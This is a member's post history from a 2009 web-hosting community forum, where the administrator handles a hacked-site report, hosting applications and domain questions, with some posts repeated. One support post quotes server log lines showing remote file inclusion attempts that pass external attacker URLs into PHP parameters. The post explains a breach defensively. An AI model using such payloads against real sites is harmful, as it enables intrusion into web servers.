Okay, I just checked. It looks like huge amounts of your files are world and group writable. So the exploit could theoretically be on someone else's site, but only infected yours because that's all it could write to. It's very important NOT to chmod 777 anything. In fact, files should always be 600, and directories 700. I've reset all the files in your public_html folder for you.
- Welcome to Xepher.Net Forums.
This section allows you to view all posts made by this member. Note that you can only see posts made in areas you currently have access to.
#377
Technical Support / Re: HACK'D!
June 20, 2009, 02:37:35 PM
Well, due to the way the server is set up, and provided you hadn't changed the permissions on any files to be world writable (chmod 777, which you should NEVER need to do here) the hack had to have come from an exploit on your own site. Most likely wordpress or another similar PHP package. This sort of thing is VERY common. I see it all the time at work, and it's the reason I've designed the server's systems in the way I have, so that if one account gets exploited, the exploit shouldn't be able to affect anyone else.
Now, as to fixing it... I do make nightly backups of everything in all accounts, so I can revert your files to the day before the hack if you want. At that point you can proceed to upgrade everything and try to secure it. I don't know if it will break stuff in wordpress since you've already upgraded the database possibly.
I see dozens of exploit attempts in the logs (which isn't surprising) and specifically these from the 15th
Now, because of the way you have rewrites set up, that could've been the root of any one of your sites. Basically, they're trying to trick the code into loading the remote code in the URL they give.
Anyway, let me know if you want me to restore backups of anything. I can put it in a separate folder to let you pick through things if you want. Also, you'll want to make sure to login to https://xepher.net/user-services/ and change your password, as any hack that can change your PHP files could possibly have read your database password from the configuration for a forum or wordpress, etc.
Now, as to fixing it... I do make nightly backups of everything in all accounts, so I can revert your files to the day before the hack if you want. At that point you can proceed to upgrade everything and try to secure it. I don't know if it will break stuff in wordpress since you've already upgraded the database possibly.
I see dozens of exploit attempts in the logs (which isn't surprising) and specifically these from the 15th
Code Select
76.8.190.193 - - [15/Jun/2009:03:39:03 +0000] "GET /index.php?action=http://217.218.225.2:2082/index.html? HTTP/1.1" 200 29380 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
70.84.173.226 - - [15/Jun/2009:12:54:14 +0000] "GET /index2.php?page=http://www.walkinroll.org/site/components/com_ignteam/Response.txt???? HTTP/1.1" 200 20875 "-" "libwww-perl/5.76"
64.127.40.199 - - [15/Jun/2009:18:48:33 +0000] "GET /index.php?board=http://217.218.225.2:2082/index.html? HTTP/1.1" 200 29379 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
Now, because of the way you have rewrites set up, that could've been the root of any one of your sites. Basically, they're trying to trick the code into loading the remote code in the URL they give.
Anyway, let me know if you want me to restore backups of anything. I can put it in a separate folder to let you pick through things if you want. Also, you'll want to make sure to login to https://xepher.net/user-services/ and change your password, as any hack that can change your PHP files could possibly have read your database password from the configuration for a forum or wordpress, etc.
#378
Knowhow Trading Post / Re: Wordpress 2.8
June 15, 2009, 11:12:03 PM
I had another report of a tokenizer error happening, as it was trying to use a function that wasn't in the local PHP here. I've rebuilt PHP with tokenizer support, so that'll fix that one at least.
#379
General Chat / Let me google that for you...
June 12, 2009, 03:35:35 PM
Found this the other day... really great for being a jackass when people ask dumb questions. You can enter a search, you get the link, and send it to them. It then chides them by typing out the search for them. :-P
http://lmgtfy.com/?q=how+do+I+turn+my+computer+on
http://lmgtfy.com/?q=how+do+I+turn+my+computer+on
#380
Web Design / Re: Paintchat canvas size
June 12, 2009, 02:15:35 PM
I can't rightly say. Most of the oekaki I'd seen before were usually around 400x400 or so. Granted, I don't ever use 'em myself, so I haven't seen one in a while. You may have to check with other people that use your particular paintchat app though, see if they have ideas. Make sure your settings are being overwritten somewhere else... e.g. multiple config files or some such.
#381
Web Design / Re: Paintchat canvas size
June 11, 2009, 02:59:23 PM
What size did you set it to? It shows up huge on my screen when I go there, and I have a 24" monitor that's 1920x1200. I'd estimate it's at least 1280x1024 in size.
#382
Applications / Re: Hollowing Birds
June 10, 2009, 05:31:53 AM
Okay, you're in! I just sent an email with login info and instructions.
#383
Applications / Re: METANOMALY (gallery, portfolio, oekaki, +)
June 10, 2009, 05:24:50 AM
Okay, you're in! You should have an email with instructions.
UPDATE: The mail I sent just bounced. The mailserver at kidavi.net just told me "no such user." Please provide a new email address.
FYI, you don't have to host everything here or anything, you're free to have sites elsewhere... I just don't do "portal" sites, and you're expected to have something that's "creative content" actually here. As for photography... of course you can host that here. Photography is creative and artistic just as much as drawing or writing. And in a more general since, as long as the main focus of your site is the artistic/creative content you were accepted for, you can use your site for other, personal things as well. (E.g. some people have some school projects, others keep a family photo gallery, etc.) The general rule is just not to abuse the service. You can't have a 3 page comic up that you never work on anymore, yet use 50GB of space backing up your personal files. :-)
For the domain name. Xepher.net is not a registrar, so I don't actually sell domain names (or accept transfers.) What I do provide is the hosting, including DNS. So at whatever registrar you have, you simply have to set the authoritative nameserver for your domain to here, (and let me know) and I'll link it with your account here. More information is in the "Virtual Domains" section of the help page http://xepher.net/help.php (which is also linked in the mail I sent.)
UPDATE: The mail I sent just bounced. The mailserver at kidavi.net just told me "no such user." Please provide a new email address.
FYI, you don't have to host everything here or anything, you're free to have sites elsewhere... I just don't do "portal" sites, and you're expected to have something that's "creative content" actually here. As for photography... of course you can host that here. Photography is creative and artistic just as much as drawing or writing. And in a more general since, as long as the main focus of your site is the artistic/creative content you were accepted for, you can use your site for other, personal things as well. (E.g. some people have some school projects, others keep a family photo gallery, etc.) The general rule is just not to abuse the service. You can't have a 3 page comic up that you never work on anymore, yet use 50GB of space backing up your personal files. :-)
For the domain name. Xepher.net is not a registrar, so I don't actually sell domain names (or accept transfers.) What I do provide is the hosting, including DNS. So at whatever registrar you have, you simply have to set the authoritative nameserver for your domain to here, (and let me know) and I'll link it with your account here. More information is in the "Virtual Domains" section of the help page http://xepher.net/help.php (which is also linked in the mail I sent.)
#384
Announcements / Re: New Forum Registrations Now Require Approval
June 10, 2009, 05:09:55 AM
Another good rule.. actually put in some info about yourself. Leaving everything blank but the username just makes me suspect "spammer" even more.
#385
Applications / Re: The OK Chronicles (a web comic)
June 08, 2009, 03:52:37 PM
Sounds like you're really jumping around on ideas. You can apply again when you get something solid and keep at it for a bit.
#386
Applications / Re: The Goddess Apprentices
June 08, 2009, 03:51:39 PM
We never heard back from you on this. If you're still interested, let me know.
#387
Applications / Re: Hollowing Birds
June 08, 2009, 03:49:11 PM
How far (how many pages) have you gotten since your last post above? Are you still interested in a site here?
#388
Applications / Re: The World of P
June 08, 2009, 03:47:22 PM
Okay, I like your art, but I just wanted to get a bit of clarification on what you ARE planning to move here. Art gallery and serial novel you said. Are you just planning to copy the http://www.joannap.110mb.com/ site here, or is there more to that? I'm sorry, but I didn't see any examples of the novel or other writing. Maybe I overlooked them on one of the galleries?
#389
Applications / Re: Court - futuristic-horror webcomic
June 08, 2009, 03:36:25 PM
Okay, I like the art. My only concern is that, like most comic projects, you'll get 5-10 pages in and then quit. Have you done any long term projects before?
#390
Applications / Re: tricky tricky! (art and comics)
June 08, 2009, 03:34:12 PM
I'm considering this one still. Anyone else have a feeling one way or another?